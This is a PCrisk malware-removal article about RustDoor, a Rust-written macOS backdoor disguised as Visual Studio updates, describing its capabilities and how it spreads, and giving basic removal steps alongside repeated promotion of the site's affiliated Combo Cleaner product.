FacebookTwitterLinkedIn

How to remove the RustDoor malware from your Mac

Also Known As: RustDoor virus
Type: Mac Virus
Damage level: Severe

Tomas Meskauskas Written by on (updated)

What kind of malware is RustDoor?

RustDoor is a Mac-targeting malware written in the Rust programming language. This malicious program has been around since at least the autumn of 2023.

At the time of writing, three variants of RustDoor have been discovered (with the initial one speculated to be a test version). This program is classed as a backdoor; its purpose is to create a "backdoor" to devices and open the system for further infection.

There is tenuous evidence linking RustDoor to the ALPHV (BlackCat) and Black Basta ransomware groups. However, a similar infrastructure can be shared by multiple threat actors who have no actual association with one another.

RustDoor malware detections on VirusTotal

RustDoor malware overview

RustDoor is a backdoor-type malware. Programs within this classification usually prep systems for further infections and/or carry them out.

After RustDoor successfully infiltrates a device, it establishes a connection to its C&C (Command and Control) server. Once connected, the program can receive and execute various commands. To elaborate, the attackers may be able to control the system through various shell commands.

RustDoor can also manage folders and files, i.e., it can browse, create, delete, and download (exfiltrate). This backdoor targets the following file formats: ASC, CONF, DOC, JSON, KDBX, KEY, OVPN, PDF, PEM, PNG, PPK, RDP, RTF, SQL, TXT, XLS, XLSX, and ZIP. The collected files are then compressed and sent to the cyber criminals' C&C server.

The malware can infiltrate files as well. This functionality can be used to download/install additional malicious programs or components (e.g., trojans, ransomware, cryptocurrency miners, etc.). RustDoor can monitor running processes and terminate them.

Furthermore, the backdoor can display fake dialogue boxes. This functionality can be used to create decoys and to request permissions or information under false pretenses. In general, criminals tend to target log-in credentials of various accounts (e.g., emails, social media, online banking, e-commerce, cryptowallets, etc.), personally identifiable details, and finance-related data (e.g., bank account details, credit card numbers, etc.).

It must be mentioned that it is common for malware developers to improve upon their creations. Therefore, potential future iterations of RustDoor could have additional/different capabilities and features.

To summarize, the presence of software like RustDoor on devices can lead to multiple system infections, serious privacy issues, financial losses, and even identity theft.

Threat Summary:
Name RustDoor virus
Threat Type Mac malware, Mac virus, Backdoor, Trojan
Detection Names Avast (MacOS:Agent-AHZ [Trj]), Combo Cleaner (Trojan.MAC.RustDoor.F), ESET-NOD32 (A Variant Of OSX/Agent.DL), Kaspersky (HEUR:Backdoor.OSX.Agent.gen), Full List Of Detections (VirusTotal)
Symptoms Trojans are designed to stealthily infiltrate the victim's computer and remain silent, and thus no particular symptoms are clearly visible on an infected machine.
Distribution Methods Fake updates, infected email attachments, malicious online advertisements, social engineering, software 'cracks'.
Damage Stolen passwords and banking information, identity theft, the victim's computer added to a botnet.
Malware Removal (Mac)

To eliminate possible malware infections, scan your Mac with legitimate antivirus software. Our security researchers recommend using Combo Cleaner.
▼ Download Combo Cleaner for Mac
To use full-featured product, you have to purchase a license for Combo Cleaner. Limited seven days free trial available. Combo Cleaner is owned and operated by Rcs Lt, the parent company of PCRisk.com read more.

Backdoor-type malware examples

We have analyzed countless malware samples; NokNokRShell, and OceanLotus are merely a few examples of mac-specific backdoors.

Malicious software can have a wide variety of functionalities, which are not limited to its type/category. However, regardless of how narrow or broad a purpose malware serves – its presence on a system endangers device and user safety. Therefore, it is crucial to eliminate all threats immediately upon detection.

How did RustDoor infiltrate my device?

RustDoor has been observed being spread under the guise of genuine software or content related to it. Most of the known disguises were associated with the mac version of Visual Studio – the Integrated Development Environment (IDE) software from Microsoft. It is noteworthy that Visual Studio's mac variant is due to be discontinued in 2024.

The following is a list of names used for RustDoor's files: "visualstudioupdate", "VisualStudioUpdater", "VisualStudioUpdater_Patch", "VisualStudioUpdating", "DO_NOT_RUN_ChromeUpdates", "Previewers", and "zshrc2".

It is pertinent to mention that this malicious program could use other disguises as well. The methods used to distribute RustDoor are currently unknown.

In general, the most prevalent proliferation techniques include: dubious download channels (e.g., freeware and third-party websites, Peer-to-Peer sharing networks, etc.), fake updates, drive-by (stealthy/deceptive) downloads, pirated programs/media, illegal software activation tools ("cracks"), malicious attachments/links in spam (e.g., emails, DMs/PMs, social media posts, SMSes, etc.), online scams, and malvertising.

What is more, some malicious programs can self-spread via local networks and removable storage devices (e.g., external hard drives, USB flash drives, etc.).

How to avoid installation of malware?

It is essential to download only from official and verified sources. We recommend activating and updating software using genuine functions/tools, as illegal activation ("cracking") tools and third-party updaters may contain malware.

Additionally, incoming emails and other messages must be treated with care. Attachments or links found in suspect mail must not be opened, as they can be infectious. We advise caution when browsing since fake and malicious online content usually appears legitimate and harmless.

We must emphasize the importance of having a reputable anti-virus installed and kept up-to-date. Security programs must be used to run regular system scans and to remove detected threats and issues. If you believe that your device is already infected, we recommend running a scan with Combo Cleaner Antivirus for macOS to automatically eliminate infiltrated malware.

Update September 18, 2024 - Cybercriminals now employ a social engineering technique that leverages professional networking platforms like LinkedIn to distribute RustDoor malware. In one instance, a fake recruiter sent a coding challenge embedded with malicious bash commands hidden in Visual Studio project files. These commands then downloaded RustDoor from compromised websites.

The payloads delivered via RustDoor operate as backdoors or information stealers. The malware achieves persistence through different mechanisms.

Instant automatic Mac malware removal: Manual threat removal might be a lengthy and complicated process that requires advanced IT skills. Combo Cleaner is a professional automatic malware removal tool that is recommended to get rid of Mac malware. Download it by clicking the button below:
 ▼ DOWNLOAD Combo Cleaner for Mac By downloading any software listed on this website you agree to our Privacy Policy and Terms of Use. To use full-featured product, you have to purchase a license for Combo Cleaner. Limited seven days free trial available. Combo Cleaner is owned and operated by Rcs Lt, the parent company of PCRisk.com read more.

Quick menu:

Unwanted applications removal:

Remove potentially unwanted applications from your "Applications" folder:

Manual removal of malicious Mac applications

Click the Finder icon. In the Finder window, select "Applications". In the applications folder, look for "RustDoor" and other suspicious applications, and drag them to the Trash. After removing unwanted application(s), scan your Mac for any remaining unwanted/malicious components.

Frequently Asked Questions (FAQ)

My computer is infected with RustDoor malware, should I format my storage device to get rid of it?

Malware removal rarely requires formatting.

What are the biggest issues that RustDoor malware can cause?

The threats carried by an infection depend on the malware's functionalities and the cyber criminals' modus operandi. RustDoor is a backdoor – hence, it may be used to cause chain infections, and it is capable of exfiltrating files from devices. Therefore, the primary dangers associated with this malware are chain infections, severe privacy issues, financial losses, and identity theft.

What is the purpose of RustDoor malware?

Most malicious programs are used for financial gain. However, attackers may also use malware to amuse themselves, realize personal grudges, disrupt processes (e.g., sites, services, companies, etc.), and even launch politically/geopolitically motivated attacks.

How did RustDoor malware infiltrate my computer?

RustDoor has been observed being proliferated as fake updates for the mac version of Visual Studio. However, other disguises are not unlikely.

Generally, malware is distributed via drive-by downloads, untrustworthy download sources (e.g., freeware and free file-hosting websites, P2P sharing networks, etc.), spam (e.g., emails, DMs/PMs, social media posts, etc.), online scams, malvertising, pirated software/media, and illegal program activation ("cracking") tools. Some malicious programs can even self-spread through local networks and removable storage devices.

Will Combo Cleaner protect me from malware?

Yes, Combo Cleaner can detect and eliminate practically all known malware infections. It must be stressed that performing a complete system scan is key since sophisticated malicious software usually hides deep within systems.

▼ Show Discussion

About the author:

Tomas Meskauskas

Tomas Meskauskas - expert security researcher, professional malware analyst.

I am passionate about computer security and technology. I have an experience of over 10 years working in various companies related to computer technical issue solving and Internet security. I have been working as an author and editor for pcrisk.com since 2010. Follow me on Twitter and LinkedIn to stay informed about the latest online security threats. Contact Tomas Meskauskas.

PCrisk security portal is brought by a company RCS LT. Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

About PCrisk

PCrisk is a cyber security portal, informing Internet users about the latest digital threats. Our content is provided by security experts and professional malware researchers. Read more about us.

Removal Instructions in other languages
New Removal Guides
Malware activity

Global malware activity level today:

Medium threat activity

Increased attack rate of infections detected within the last 24 hours.

Top Removal Guides
QR Code
RustDoor virus QR code
Scan this QR code to have an easy access removal guide of RustDoor virus on your mobile device.
We Recommend:

Get rid of Mac malware infections today:

▼ REMOVE IT NOW
Download Combo Cleaner for Mac

Platform: macOS

Editors' Rating for Combo Cleaner:
Editors ratingOutstanding!

[Back to Top]

To use full-featured product, you have to purchase a license for Combo Cleaner. Limited seven days free trial available. Combo Cleaner is owned and operated by Rcs Lt, the parent company of PCRisk.com read more.